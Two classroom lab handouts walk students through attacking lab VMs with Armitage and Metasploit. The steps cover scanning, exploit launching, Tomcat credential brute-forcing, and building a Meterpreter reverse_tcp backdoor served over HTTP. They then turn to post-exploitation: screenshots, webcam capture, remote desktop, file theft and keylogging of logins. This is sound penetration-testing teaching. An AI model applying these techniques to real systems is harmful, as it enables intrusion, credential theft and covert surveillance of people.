Armitage Introduction Lab

Prerequisites
This lab will help introduce you to Armitage for Metasploit. Before we begin, you will
need the following virtual machines:

 Metasploitable Linux Virtual Machine

 BackTrack 5r1 Virtual Machine

Set both Virtual Machine network adapters to the NAT setting.

Setup
BackTrack Linux
1. Login as username root, password toor
2. Type dhclient to request an IP address
3. Type startx to launch X-Windows
4. Open a Terminal
5. Type: msfupdate to update Metasploit and Armitage to the latest versions
Metasploitable
1. Login as username msfadmin, password msfadmin
2. Type sudo dhclient to request an IP address
Take note of the IP address of the Metasploitable virtual machine. You will need it for
the remainder of this lab.
Start Armitage
1. Open a terminal and type “service postgresql start” and hit enter.
2. On the same terminal type “msfdb start” and hit enter.
3. Now click on Armitage icon /or on terminal type armitage and press enter
4. A dialog will ask if you'd like to start Metasploit's RPC server. Press Yes.

Wait for Armitage to connect to Metasploit. You will see Connection Refused
multiple for up to two minutes. This is normal. If something else happens, press
Cancel and then press Help to troubleshoot the issue.
Reconnaissance
These steps will show you how to perform reconnaissance against the Metasploitable
host. Remember that some scan techniques are more thorough than others.

1. Go to Hosts -> MSF Scans

2. Type in the IP address of the Metasploitable VM and press Ok
3. Right-click the host that appears in Armitage and select Services
4. Wait 30 seconds and press Refresh

Do not close the Services tab, we're going to compare the existing results to the
results from another (more thorough) scan in a moment.

5. Go to Hosts -> Clear Database

6. Go to Hosts -> NMap -> Intense Scan, all TCP Ports
7. Type in the IP address of the Metasploit VM and press Ok

An NMap Tab will open. Wait for a dialog that says Scan complete before
proceeding.
8. Right-click the Metasploitable host and select Services

How do the results of the Intense NMap Scan compare to the results of the Metasploit
scan? Try to repeat this process for other scans to appreciate the differences in the
information they each provide.
Web Application Exploitation
These steps will show you how to check which exploits a service is vulnerable to.

1. Go to Attacks -> Find Attacks

2. Right-click Metasploitable and navigate to:
Attacks -> webapp -> Check Exploits
3. In the Check Exploits tab, press Control+F and search for "vulnerable" without
the quotes.
4. Right-click Metasploitable and navigate to:
Attacks -> webapp -> [an attack that Metasploitable is vulnerable to]
5. Press Launch
 6. Right-click Metasploitable and navigate to:
Shell 1 -> Interact
7. To close the session, right-click Metasploitable -> Shell 1 -> Disconnect

Service Exploitation
These steps will guide you through finding another exploitable service and obtaining
another shell session.

1. Go to Attacks -> Find Attacks

If you did this for the Web Application Exploitation steps, you don't need to do it
again. Doing it again doesn't hurt anything though.

2. Right-click Metasploitable and navigate to the Attacks menu

3. Select an exploit, don't change any options, and click Launch. Repeat this step
until you find one that works.

Hint: there are two other exploits in the Attacks menu that will work without any
modification.

Do not close the Shells you receive from your service exploitation in this step.
Linux Shell Post Exploitation
To accomplish these steps, you must have root access to the Metasploitable system.

1. Right-click Metasploitable and go to Shell N -> Interact for each of your shell
sessions
2. In each shell type: whoami
3. Find the shell that has a root user. This is the shell that you will use for these
instructions.
4. Right-click Metasploitable and go to the root shell session:
Shell N -> Post Modules
5. Double-click the enum_linux module in the module browser.
6. Press Launch
7. Go to View -> Loot
8. Double-click an item to view it.

The enum_linux module automatically captures a lot of data about a Linux system. Here
are a few questions to answer as you go through all of this data:

1. Which version of apparmor is installed?

2. How many users with passwords and valid shells (e.g., /bin/bash or /bin/sh) are on
the system?
3. Which command did msfadmin use previously to reset the logs on the system?
Tomcat Attack
These steps will walk you through attacking Apache Tomcat. You will learn how to brute
force a service, search for a relevant attack, and conduct post-exploitation using the Java
version of Meterpreter.

1. Search for the tomcat_mgr_login module in the module browser

2. Double-click tomcat_mgr_login
3. The default RPORT is 8080. Apache Tomcat is on Metasploitable, but it's not this
port. Change the RPORT value to the correct port.

Hint: Right-click Metasploitable and select Services.

4. Press Launch
5. Press Ctrl+F in the tomcat_mgr_login tab and search for "success"

Great, you now have credentials you may use to access the Apache Tomcat
service. Let's find out what you can do with these credentials...

6. Search for tomcat in the module browser.

7. Double-click the tomcat related exploit
8. Set USERNAME, PASSWORD, and RPORT to the values you discovered in
steps 1-5.

If everything is correct, you will now have a Java meterpreter session on the
Metasploitable host. Right-click Metasploitable -> Meterpreter and play with the options
to see what is available to you. Meterpreter has a lot more power than a simple shell
session. Exploring Windows Meterpreter is the subject of the bonus lab.
Bonus Lab: Post Exploitation
1. Prerequisites
To complete this lab, you will need a Windows target. The steps in this lab will work for
a Windows XP, Windows Vista, and Windows 7 target.

Your attack host should be BackTrack Linux 5r1 with the latest version of Armitage and
Metasploit.
2. Steps
Generate a Backdoor and Listener (BackTrack Linux):
Follow these steps to generate an executable version of Metasploit's super payload,
Meterpreter. These steps will have you save the executable in the default directory for
serving files over HTTP. These steps will also have you setup a multi/handler to receive
connections from Meterpreter.

1. Start Armitage
2. In the module browser navigate to:
payloads -> windows -> meterpreter -> reverse_tcp
3. Change RPORT to 9898
4. Change Output to exe
 5. Hold the shift button and click Launch
6. Save the file to /var/www/backdoor.exe
7. Change Output to multi/handler
8. Click Launch
Start a webserver (BackTrack Linux)
Follow these steps to start the Apache webserver. You will also use need to learn the IP
address of your BackTrack host.

1. Open a terminal
2. Type: service start apache2
3. Use ifconfig to learn the ip address of your BackTrack Linux host.
Get in through the backdoor (Windows Victim)
Follow these steps to "exploit" your Windows host. Really, you're just downloading the
Meterpreter executable and running it.

1. Open Internet Explorer

2. Navigate to http://[ip address of BackTrack Linux host/backdoor.exe
3. Run the file
Post Exploitation (BackTrack Linux)
You should now see a red computer with lightning bolts around it in Armitage. This is
your Windows target. These steps will take you through various post-exploitation actions
with Armitage. After these steps, you will have an appreciation for how much
Meterpreter can do.

I see you...

1. Right-click the compromised host and navigate to:

Meterpreter 1 -> Explore -> Screenshot
2. Right-click the compromised host and navigate to:
Meterpreter 1 -> Explore -> Webcam Shot

This will only work if your Windows host has a webcam attached.

Remote Control

1. Right-click the compromised host and navigate to:

Meterpreter 1 -> Interact -> Desktop (VNC)

Armitage will open a dialog telling you the port and display number to connect a
VNC client to. Take note of the port number. Here I will use 53. It will be
something different for you.

2. Open a Terminal in BackTrack Linux

3. Type: vncviewer 127.0.0.1:53

Change 53 to the display number provided by Armitage.

Get the Data

1. Right-click the compromised host and navigate to:

Meterpreter 1 -> Explore -> File Browser
2. In the file path text field (top of the browser), type C:\ and hit Enter.
3. Navigate to your desktop
4. Download a file
5. Go to: View -> Downloads
6. Double-click the file to view it

Capture your Key Strokes

1. Right-click the compromised host and navigate to:

Meterpreter 1 -> Explore -> Log Keystrokes
2. Press Launch
3. From your Windows target: navigate to a website that you use, log out, and log
in by typing your credentials.
4. Take a look at the output of the Log Keystrokes tab.

Hacking Using Armitage & the Metasploit Framework

A. Introduction
A.1. Armitage:
Armitage is software that is included with Backtrack 5 version R3. It incorporates
the several key hacking frameworks such as Metasploit and utilizes built-in tools like
NMAP to automate the process of hacking.
A.2. In this lab:
In this lab your focus will be a full-circle attempt at hacking a windows XP
machine on a network, starting with enumeration and ending with full-admin access to
the target machine.
You have been given the following information:
“There is a vulnerable machine located on the 10.0.0.255 network. Use your
resources to hack it and leave something behind to show that you have infiltrated
the machine.”

B. Armitage Start-Up
1. Begin by opening up a terminal on your backtrack machine and typing the
following;
a. armitage
b. Upon doing so, you will be prompted with the following options:
c. From here click “connect” since you are not connected to the internet.
d. You will then be prompted with a screen, asking if you want to let
Armitage start up a Metasploit RPC server. Since we are using Metasploit,
click “YES.”
e. You should now see a connection screen (Give it a second as we are on a
virtual server and computing power takes time at 256mb of ram).

f. After the connection module is finished, if all was done successfully, you
should now see the Armitage GUI. Congrats and get ready to have some
fun!
C. Getting around in Armitage
The Menu Bar:
Lets start with an overview of the GUI and a quick synopsis of how things work.

Armitage has the following options available for users in the menu bar:
1. Armitage: This is used much like a normal file section. Users can set preferences
and connections (i.e. VPN) along with various options such as their exploit rank
which will adjust the sensitivity of certain exploits (This is very useful for
network testing).
2. View: The view option controls items and processes listed at the bottom of the
screen (i.e. Where you currently see the Metasploit Logo). The “View” option
lets you control the way information is formatted as it is processed through
Metasploit.
3. Hosts: The “Hosts” option lets you discover and manage hosts on a myriad of
different networks. You can either choose to add hosts manually or discover new
hosts using tools like NMAP or even DNS enumeration.
4. Attacks: This option is used to do one of two things. First, it can find attacks for a
specific host and let you choose which one you wish to attempt. Alternately, it has
an attack automation process known as “Hail Mary” that will find and execute all
 known attacks in the metasploit frameworks database against a given target. This
option should only be used if a hacker is very lazy or very desperate as it leaves a
large network footprint.
5. Workspaces: This enables you to manage the Current Hosts selected, and if you
desire, it allows you to create multiple views and attack spectrums (e.g. as is used
for migrating through several levels of network defense).
6. Help: Links to helpful websites about Armitage.
The Exploit and Workspace Windows:
The Exploit Window (i.e. the smaller window to the left) is used to list all the
available exploits that are currently available to you via the Metasploit network. These
exploits can either be searched through manually or a search for a specific exploit or
operating system can be conducted using the small search box beneath the window.
The Workspace Window to the right is our main attack listing area. In this area
machines will be listed and these can be selected for further exploitation. We will cover
the Workspace window further through the course of this lab.

The Console Log:

The console log is for all operations that the Armitage framework is committing
from your actions. From this screen you will be able to view many useful items such as,
for example, scanning information to attack progress or even password keylogging. The
possibilities are only limited to the current script you are using. This window will be
covered further in our examples.
D. Enumeration in Armitage
We will start our attack by scanning the 10.0.0.0 network using NMAP (i.e. Network
Mapper). This is a built in Armitage security scanner used for host discovery and
services identification on a network, as well as port scanning and operating system
detection.
1. Begin by selecting the “Hosts” option and choosing the following:
a. Nmap Scan -> Intense Scan
b. You will then be greeted with an input box. This will be the address of the
network we want to scan. Enter the following information:
i. 10.0.0.* (the star is a wildcard that denotes all 255 machines) & click
OK.

c. You should now see that the console window has opened up a new
window called “nmap.” Further, you will see the following information being to
scroll on the screen:
d. Allow the scan to run completely (this should take a minute or two) and
ultimately, you will notice the “discovered” machines depicted in the
“Workspace” window.

e.These are machines that have been found on the 10.0.0.* network. Lets dig
deeper.
i. You should see that the icon in the workspace view has changed to
a Windows logo as seen below:
 ii. To find out more about this machine:
1. Right click the 10.0.0.5 machine and then click “services.”
2. You should now see a new console log window called
“Services” which gives a listing of all the current services
that are running on this machine along with information
about each service, such as port number, the protocol it
operates on, etc.

You have now successfully fingerprinted the operating system and the services running
the victim machine and have enough information to formulate an attack.
E. The Attack
Gaining Access:
Armitage has several options available to exploit a Windows XP machine. With XP
machines being used in over 30 percent of the worlds networks this is highly
advantageous to hackers.
1. To start the attack, highlight the 10.0.0.5 machine and choose the following:
Attacks -> Find Attacks
a. After choosing this option you should be greeted with the following

screen:
b. Click “OK” and navigate back to the 10.0.0.5 machine. Right-Click on
this machine and you should now see an option labeled “attacks”. As you
can see that there are several options to choose, but how do you know
which one works?
c. Instead of using one of these options we are going to do our homework
and use a well known exploit entitled ms08_067_netapi. Enter the word
“netapi” into the exploit browser’s search box on the left, as seen below:.

d. You should then see the following:

e. Drag-and-drop the option entitled ms08_067_netapi onto the 10.0.0.5
machine.

f. After doing so you will be given the screen seen below. This screen
contains several options and a brief synopsis about what the exploit does.
We are going to leave everything as its default setting for now and click
on the “Launch” icon.
 g. At this point, a new console log window will be created entitled “exploit”
which shows how the exploit is communicating with the victim machine.
Additionally, a lightning graphical effect appears on the icon for machine
10.0.0.5 to indicate that it has been compromised. You have successfully
hacked the victim machine!

Maintaining Access:
Now that the machine has been compromised, what can we do with it? Begin by right-
clicking on the newly infected machine and choose the following:
MeterPreter 1 -> Access -> Migrate Now!
This is a very important step in the hacking process as it binds your newly created
Meterpreter shell with a running process on the victim machine. It allows for full control
of the shell so that it does not become blown out either by accident, or by the user OS
terminating a service. This would cause you to have to repeat the entire process.
F. Leaving your mark
Since we are Pen-Testers and not malicious hackers we will leave our mark on this
machine to let the victim know that we have hacked them while not doing any actual
damage.
1. Start by right clicking the victim machine and choosing:
Meterpreter 1 -> Interact -> Command Shell

a. By doing this you will receive a new console log window that should
contain a very familiar command-line prompt:
b. Use the following command to verify that you are in control of the victim
machine:
i. ipconfig
ii. By doing this we can see that you IP address is now 10.0.0.5 and
thus, you are operating on the victim machine.
iii. Browse to the the following directory using the commands you
have previously mastered:
C:\wehackedyou
(Note: if your command-line skills are a little rusty, to access
this directory, type: “cd /wehackedyou” iv. Once inside this folder
create a folder with your the following format:
1. LastnameF where F is equal to the first letter of your first
name.
2. This will let you instructor know that you have completed
the lab.N
3. Again, if you are uncertain the command is:: mkdir (i.e.
make directory).
4. So, for example, if your name was John Smith, type the
following:
mkdir SmithJ
5. To verify that it is there, type dir \wehackedyou
v. The final important step is to remove our current session so that we
do not alarm system administrators or disrupt other hackers in your
class.
 1. Right click the victim machine and choose the following:
2. Meterpreter 1 -> Kill
3. This will terminated your current Meterpreter Session.
Congratulations! You have sucessfully hacked a windows XP machine and can now be
considered a fledgling script kiddie. Be sure to only use your newfound abilities to test
suitable networks on which you have legal consent to do so.